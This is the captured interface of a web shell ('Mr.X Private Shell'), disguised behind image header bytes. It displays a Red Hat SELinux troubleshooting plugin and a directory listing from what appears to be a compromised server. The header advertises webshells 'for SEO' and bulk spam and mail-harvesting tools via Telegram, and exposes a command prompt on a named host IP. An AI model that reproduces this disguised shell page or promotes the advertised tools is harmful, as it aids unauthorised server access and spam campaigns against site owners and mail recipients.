����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

deexcl@216.73.217.71: ~ $
#
# Authors: Dan Walsh <dwalsh@redhat.com>
#
# Copyright (C) 2007-2013 Red Hat, Inc.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 675 Mass Ave, Cambridge, MA 02139, USA.
#

import gettext
translation=gettext.translation('setroubleshoot-plugins', fallback=True)
_=translation.gettext

from setroubleshoot.util import *
from setroubleshoot.Plugin import Plugin
import os
from stat import *
import selinux

customizable_types = None
def customizable(target):
    global customizable_types
    if not customizable_types:
        fd = open(selinux.selinux_customizable_types_path())
        customizable_types = fd.read().split("\n")
        fd.close()
    return target in customizable_types


# List of path prefixes for which this plugin is not executed
excluded_paths = ["/sys/", "/proc/", "/memfd:"]
# Test if the specified path starts with some excluded prefix
def excluded_path(target_path):
    for path in excluded_paths:
        if target_path.startswith(path): return True
    return False

import selinux
class plugin(Plugin):
    summary = _('''
    SELinux is preventing $SOURCE_PATH "$ACCESS" access to $TARGET_PATH.
    ''')

    fix_cmd = "/sbin/restorecon $TARGET_PATH"

    fix_description = _('''
    You can restore the default system context to this file by executing the
    restorecon command.  restorecon '$TARGET_PATH', if this file is a directory,
    you can recursively restore using restorecon -R '$TARGET_PATH'.
    ''')

    def get_problem_description(self, avc, args):
        return _('''
    SELinux denied access requested by $SOURCE. $TARGET_PATH may
    be mislabeled.  $TARGET_PATH default SELinux type is
    <B>%s</B>, but its current type is <B>$TARGET_TYPE</B>. Changing
    this file back to the default type may fix your problem.
    <p>
    File contexts can be assigned to a file in the following ways.
    <ul>
        <li>Files created in a directory receive the file context of the parent directory by default.
        <li>The SELinux policy might override the default label inherited from the parent directory by
            specifying a process running in context A which creates a file in a directory labeled B
            will instead create the file with label C. An example of this would be the dhcp client running
            with the dhcpc_t type and creating a file in the directory /etc. This file would normally
            receive the etc_t type due to parental inheritance but instead the file
            is labeled with the net_conf_t type because the SELinux policy specifies this.
        <li>Users can change the file context on a file using tools such as chcon, or restorecon.
    </ul>
    This file could have been mislabeled either by user error, or if an normally confined application
    was run under the wrong domain.
    <p>
    However, this might also indicate a bug in SELinux because the file should not have been labeled
    with this type.
    <p>
    If you believe this is a bug, please file a bug report against this package.
    ''') % args[1]

    if_text = _("If you want to fix the label. \n$TARGET_PATH default label should be %s.")

    def get_if_text(self, avc, args):
        return self.if_text % args[1]


    then_text = _('you can run restorecon. The access attempt may have been stopped due to insufficient' \
         + ' permissions to access a parent directory in which case try to change the following command accordingly.')
    do_text = '# /sbin/restorecon -v $TARGET_PATH'

    def __init__(self):
        Plugin.__init__(self, __name__)
        self.set_priority(100)
        self.level = "green"
        self.fixable = True
        self.button_text=_("Restore\nContext")

    def analyze(self, avc):
        if not avc.query_environment: return None
        if avc.tcontext.type in [ "cifs_t", "nfs_t" ]: return None
        if avc.tcontext.type not in file_types: return None
        if avc.all_accesses_are_in("relabelto"): return None
        restorecon_files = {}
        restorecon_files['dir'] = S_IFDIR
        restorecon_files['file'] = S_IFREG
        restorecon_files['lnk_file'] = S_IFLNK
        restorecon_files['chr_file'] = S_IFCHR
        restorecon_files['blk_file'] = S_IFBLK

        if avc.has_tclass_in(restorecon_files.keys()):
            if avc.tpath is None: return None
            if avc.tpath == "/": return None
            if avc.tpath[0] != '/': return None
            if excluded_path(avc.tpath): return None
            if customizable(avc.tcontext.type):
                return None
            try:
                mcon = selinux.matchpathcon(avc.tpath.strip('"'), restorecon_files[avc.tclass])[1]
                mcon_type=mcon.split(":")[2]
                if mcon_type != avc.tcontext.type:
                    return self.report((0, mcon_type))
            except OSError as e:
                pass

        return None

Filemanager

Name Type Size Permission Actions
__pycache__ Folder 0755
__init__.py File 2 B 0644
allow_anon_write.py File 3.25 KB 0644
allow_execheap.py File 2.39 KB 0644
allow_execmem.py File 3.07 KB 0644
allow_execmod.py File 5.41 KB 0644
allow_execstack.py File 4.73 KB 0644
allow_ftpd_use_cifs.py File 3.41 KB 0644
allow_ftpd_use_nfs.py File 3.3 KB 0644
associate.py File 2.15 KB 0644
automount_exec_config.py File 2.66 KB 0644
bind_ports.py File 2.81 KB 0644
catchall.py File 2.89 KB 0644
catchall_boolean.py File 2.89 KB 0644
catchall_labels.py File 2.2 KB 0644
chrome.py File 2.6 KB 0644
connect_ports.py File 2.68 KB 0644
cvs_data.py File 2.58 KB 0644
dac_override.py File 2.1 KB 0644
device.py File 2.74 KB 0644
disable_ipv6.py File 1.62 KB 0644
file.py File 3.21 KB 0644
filesystem_associate.py File 2.46 KB 0644
httpd_can_sendmail.py File 1.93 KB 0644
httpd_unified.py File 2.86 KB 0644
httpd_write_content.py File 2.11 KB 0644
kernel_modules.py File 2.74 KB 0644
leaks.py File 2.49 KB 0644
mmap_zero.py File 2.33 KB 0644
mounton.py File 2.48 KB 0644
mozplugger.py File 2.79 KB 0644
mozplugger_remove.py File 2.17 KB 0644
openvpn.py File 2.76 KB 0644
public_content.py File 2.57 KB 0644
qemu_blk_image.py File 2.55 KB 0644
qemu_file_image.py File 2.88 KB 0644
restorecon.py File 5.34 KB 0644
restorecon_source.py File 3.01 KB 0644
rsync_data.py File 2.53 KB 0644
samba_share.py File 2.94 KB 0644
sandbox_connect.py File 2.23 KB 0644
selinuxpolicy.py File 3.09 KB 0644
setenforce.py File 2.39 KB 0644
sshd_root.py File 2.08 KB 0644
swapfile.py File 2.23 KB 0644
sys_module.py File 2.35 KB 0644
sys_resource.py File 2.62 KB 0644
vbetool.py File 2.52 KB 0644
wine.py File 2.92 KB 0644
xen_image.py File 2.8 KB 0644